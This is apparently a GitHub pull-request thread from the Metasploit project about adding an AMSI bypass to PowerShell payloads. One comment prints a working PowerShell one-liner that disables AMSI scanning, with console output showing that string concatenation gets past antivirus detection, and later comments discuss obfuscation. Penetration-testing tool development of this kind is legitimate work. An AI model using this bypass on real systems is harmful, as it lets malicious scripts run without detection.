Integrate PowerShell Protections Bypass

[phra]

Will fix https://github.com/rapid7/metasploit-framework/issues/11283

[bwatters-r7]

@phra I missed this for a bit, but I'd like to test and land this. Can you give specific examples where our current payloads fail, but this succeeds so we can have some testing benchmarks?

[phra]

@bwatters-r7 just try any powershell payloads on an updated win 10 machine with AMSI.

[phra]

as reference: https://iwantmore.pizza/posts/amsi.html

[timwr]

Very interesting thanks @phra

[timwr]

I didn't expect the '+' to work so well:

Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\User>powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\User>
>> $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Stati
c').SetValue($null,$true);
>>
>>
>>
At line:1 char:1
+
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS C:\Users\User> $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');$Ref.GetField('amsiIn'+'itFai
led','NonPublic,Static').SetValue($null,$true);
>>
>>
>>
PS C:\Users\User>
PS C:\Users\User>

[timwr]

Thanks @phra We still need to add this to webdelivery (preferably as an off-by-default option). It would be nice to have the strings obfuscated dynamically, but this will do for now.

[phra]

I didn't expect the '+' to work so well:

It would be nice to have the strings obfuscated dynamically, but this will do for now.

empire includes https://github.com/danielbohannon/Invoke-Obfuscation but depends on PowerShell and that means adding it as optional? dependency or embedding it directly within the project with a ~50mb overhead of stuff.

writing a simpler, similar project in ruby may be an overkill.

any idea?

[0xVIC]

Another reference

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

[phra]

was prepend_protections_bypass option defined somewhere?

i don't see the setting available yet with Framework Version: 5.0.19-dev.

[timwr]

@phra apologies I didn't send a PR with that part, I think I tested with this commit: https://github.com/timwr/metasploit-framework/commit/a0d6bcd3c1a9763a31d64b822f400493bb4042fc

[phra]

oh ok, i hope it will be merged into master soon! regarding the web delivery, it should be enough to prepend the bypass before the delivery script itself when choosing PowerShell as target.

[phra]

any update? i still cannot easily add the amsi bypass to powershell payloads.

[phra]

@timwr any update on this?

[timwr]

@phra did you test the commit I posted above? https://github.com/timwr/metasploit-framework/commit/a0d6bcd3c1a9763a31d64b822f400493bb4042fc maybe you can send a PR to the framework repository that enables it for web_delivery?

[phra]

maybe you can send a PR to the framework repository that enables it for web_delivery?

@timwr see https://github.com/rapid7/metasploit-framework/pull/12446